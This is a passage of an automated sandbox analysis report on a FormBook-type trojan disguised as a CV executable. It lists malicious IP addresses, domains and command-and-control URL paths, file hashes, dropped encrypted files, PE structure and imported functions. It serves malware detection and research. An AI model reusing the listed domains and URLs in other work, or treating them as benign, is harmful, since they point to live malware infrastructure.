                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      203.161.43.228
                                                                                      www.connecty.liveMalaysia
                                                                                      45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                      13.248.169.48
                                                                                      www.tals.xyzUnited States
                                                                                      16509AMAZON-02UStrue
                                                                                      104.21.42.77
                                                                                      www.zriaraem-skiry.sbsUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      103.21.221.87
                                                                                      rtpterbaruwaktu3.xyzunknown
                                                                                      9905LINKNET-ID-APLinknetASNIDtrue
                                                                                      47.76.213.197
                                                                                      www.ytsd88.topUnited States
                                                                                      9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                      154.90.58.209
                                                                                      all.wjscdn.comSeychelles
                                                                                      40065CNSERVERSUStrue
                                                                                      8.210.46.21
                                                                                      ymx01.cnSingapore
                                                                                      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                      147.255.21.187
                                                                                      www.50food.comUnited States
                                                                                      7203LEASEWEB-USA-SFO-12UStrue
                                                                                      76.223.74.74
                                                                                      ssl.goentri.comUnited States
                                                                                      16509AMAZON-02UStrue
                                                                                      74.48.143.82
                                                                                      bpgroup.siteCanada
                                                                                      14663TELUS-3CAtrue
                                                                                      172.67.168.228
                                                                                      www.nmgzjwh.netUnited States
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      194.58.112.174
                                                                                      www.sklad-iq.onlineRussian Federation
                                                                                      197695AS-REGRUtrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1561733
                                                                                      Start date and time:2024-11-24 08:08:08 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 57s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:8
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:CV Lic H&S Olivetti Renzo.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@19/12
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 96%
                                                                                      • Number of executed functions: 54
                                                                                      • Number of non-executed functions: 296
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target DIRZUznVUfWlad.exe, PID 5728 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      TimeTypeDescription
                                                                                      02:10:11API Interceptor9578973x Sleep call for process: winver.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      203.161.43.228DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                      • www.connecty.live/q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq
                                                                                      PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                                      • www.quilo.life/ftr3/
                                                                                      PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.lyxor.top/top4/
                                                                                      Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.quilo.life/ftr3/
                                                                                      Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.quilo.life/ftr3/
                                                                                      PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.quilo.life/ftr3/
                                                                                      Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.virox.top/basq/
                                                                                      Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.quilo.life/ftr3/
                                                                                      PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.quilo.life/ftr3/
                                                                                      6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.virox.top/basq/
                                                                                      13.248.169.48Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/stx5/
                                                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/k1td/
                                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                      • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.remedies.pro/hrap/
                                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.optimismbank.xyz/lnyv/
                                                                                      New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.avalanchefi.xyz/ctta/
                                                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.egldfi.xyz/3e55/
                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tals.xyz/010v/
                                                                                      Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.wajf.net/dkz5/
                                                                                      rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                                                      • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.supernutra01.onlineProject Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.220.36
                                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.220.36
                                                                                      www.sklad-iq.onlineItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                      • 194.58.112.174
                                                                                      www.connecty.liveDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                      • 203.161.43.228
                                                                                      www.ytsd88.topPO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                      • 47.76.213.197
                                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                      • 47.76.213.197
                                                                                      payments.exeGet hashmaliciousFormBookBrowse
                                                                                      • 47.76.213.197
                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 47.76.213.197
                                                                                      ssl.goentri.comSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 76.223.74.74
                                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                      • 76.223.74.74
                                                                                      www.tals.xyzMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 13.248.169.48
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      VNPT-AS-VNVNPTCorpVNmipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 14.249.184.119
                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 123.28.58.156
                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 14.188.157.232
                                                                                      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 113.164.17.185
                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 14.249.184.121
                                                                                      m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 113.163.190.100
                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 14.172.55.92
                                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 113.189.219.236
                                                                                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                      • 123.31.16.51
                                                                                      sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                      • 113.181.189.118
                                                                                      AMAZON-02USarm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 3.122.148.244
                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 13.223.155.145
                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 18.243.54.8
                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 15.206.178.249
                                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 3.99.230.17
                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 3.167.69.129
                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 35.74.17.116
                                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 54.126.105.86
                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 44.226.3.74
                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      • 108.144.192.115
                                                                                      CLOUDFLARENETUSTAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.76.162
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.84
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.174.133
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 104.21.74.61
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.84
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.160.80
                                                                                      WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                      • 172.67.165.138
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.33.116
                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                      • 172.64.41.3
                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 172.64.41.3
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\winver.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288256
                                                                                      Entropy (8bit):7.9954672308297035
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:4mRIJ4vP9faroXFTqDqrorz+8ajTlpIwgPojRFVac:gJIBarzkOz+/flpIwgg9
                                                                                      MD5:6190EBFC69C7BFB944DD2C9C4E04B14D
                                                                                      SHA1:C9B487C55555F0784FB0F792BF2CB34B357D109E
                                                                                      SHA-256:4569A96FAE14B683AA7084C0AFF8BED984331EF55E5AD914E014B7A3DC2198DF
                                                                                      SHA-512:0913A26147EE597E29B845ACE90AEDC1A68C9FCE4F42F35F9446DB2A6B6B49576F2621334519DFA526561881D82088E1D76CBCF49616D31E909E63365D077605
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.c.GYGQ40JJH..OS.B2OTAPR.K0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9.GZG_+.DJ.@.n.W..n.)9!k;B>+!X<g9&?Z[>j*,.=&8b[!t...k&_5)}4\M~GQ44JJH08F.k"U.i!7.v+W.V...}: ....t)^.I...s4&.."(Xl,4.QGZGQ44J..I9.RWBN...PRKK0QLS.QE[LP?4J.LI9OSVB2OTqERKK QLSIUGZG.44ZJHI;OSPB2OTAPRMK0QLS9QG*CQ46JJHI9OQV..OTQPR[K0QLC9QWZGQ44JZHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK.%)+MQGZ..04JZHI9.WVB"OTAPRKK0QLS9QGzGQT4JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9
                                                                                      Process:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288256
                                                                                      Entropy (8bit):7.9954672308297035
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:4mRIJ4vP9faroXFTqDqrorz+8ajTlpIwgPojRFVac:gJIBarzkOz+/flpIwgg9
                                                                                      MD5:6190EBFC69C7BFB944DD2C9C4E04B14D
                                                                                      SHA1:C9B487C55555F0784FB0F792BF2CB34B357D109E
                                                                                      SHA-256:4569A96FAE14B683AA7084C0AFF8BED984331EF55E5AD914E014B7A3DC2198DF
                                                                                      SHA-512:0913A26147EE597E29B845ACE90AEDC1A68C9FCE4F42F35F9446DB2A6B6B49576F2621334519DFA526561881D82088E1D76CBCF49616D31E909E63365D077605
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.c.GYGQ40JJH..OS.B2OTAPR.K0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9.GZG_+.DJ.@.n.W..n.)9!k;B>+!X<g9&?Z[>j*,.=&8b[!t...k&_5)}4\M~GQ44JJH08F.k"U.i!7.v+W.V...}: ....t)^.I...s4&.."(Xl,4.QGZGQ44J..I9.RWBN...PRKK0QLS.QE[LP?4J.LI9OSVB2OTqERKK QLSIUGZG.44ZJHI;OSPB2OTAPRMK0QLS9QG*CQ46JJHI9OQV..OTQPR[K0QLC9QWZGQ44JZHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK.%)+MQGZ..04JZHI9.WVB"OTAPRKK0QLS9QGzGQT4JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9OSVB2OTAPRKK0QLS9QGZGQ44JJHI9
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.139764677509903
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:CV Lic H&S Olivetti Renzo.exe
                                                                                      File size:1'207'808 bytes
                                                                                      MD5:dffcfc55dbe3596498888c48f569adcd
                                                                                      SHA1:0a75b7cdb8ded9722a7f2188777793c6c62a178b
                                                                                      SHA256:1dae087c41578f5a3a6ed11bbe54efa045598e2bdccf54db0315bbbe36fc1956
                                                                                      SHA512:a8932db72aa417c32c482fea159b0151cc2c15fe22e11977d755b829523400431018569cfe6f1ef949a235842d6d4edf3e8a5433b1c8601edc2e50f8056c18eb
                                                                                      SSDEEP:24576:Ztb20pkaCqT5TBWgNQ7aQ08vv9tUKJWpY9rcn6A:qVg5tQ7aQ0Oexpii5
                                                                                      TLSH:4745CF2373DD8360C3B25273BA65B711BEBF782506A1F86B2FD4093DE920122561E673
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x425f74
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x673F65C1 [Thu Nov 21 16:54:25 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                      Instruction
                                                                                      call 00007F25C45242AFh
                                                                                      jmp 00007F25C45172C4h
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F25C451744Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007F25C45177AEh
                                                                                      bt dword ptr [004C0158h], 01h
                                                                                      jnc 00007F25C4517449h
                                                                                      rep movsb
                                                                                      jmp 00007F25C451775Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F25C4517614h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F25C4517450h
                                                                                      bt dword ptr [004BA370h], 01h
                                                                                      jc 00007F25C4517920h
                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                      jnc 00007F25C45175EDh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F25C45175FEh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F25C45175DDh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F25C451744Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F25C4517453h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F25C45174A5h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F25C45174F8h
                                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                      • [LNK] VS2012 UPD4 build 61030
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5dc70.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1220000x6c4c.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xc40000x5dc700x5de007a99ade470f8c91b109d9a5368318935False0.9296640937083888data7.898929417249416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1220000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                      RT_RCDATA0xcc7b80x54f77data1.000333311304138
                                                                                      RT_GROUP_ICON0x1217300x76dataEnglishGreat Britain0.6610169491525424
                                                                                      RT_GROUP_ICON0x1217a80x14dataEnglishGreat Britain1.25
                                                                                      RT_GROUP_ICON0x1217bc0x14dataEnglishGreat Britain1.15
                                                                                      RT_GROUP_ICON0x1217d00x14dataEnglishGreat Britain1.25
                                                                                      RT_VERSION0x1217e40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                      RT_MANIFEST0x1218c00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                                      DLLImport
                                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
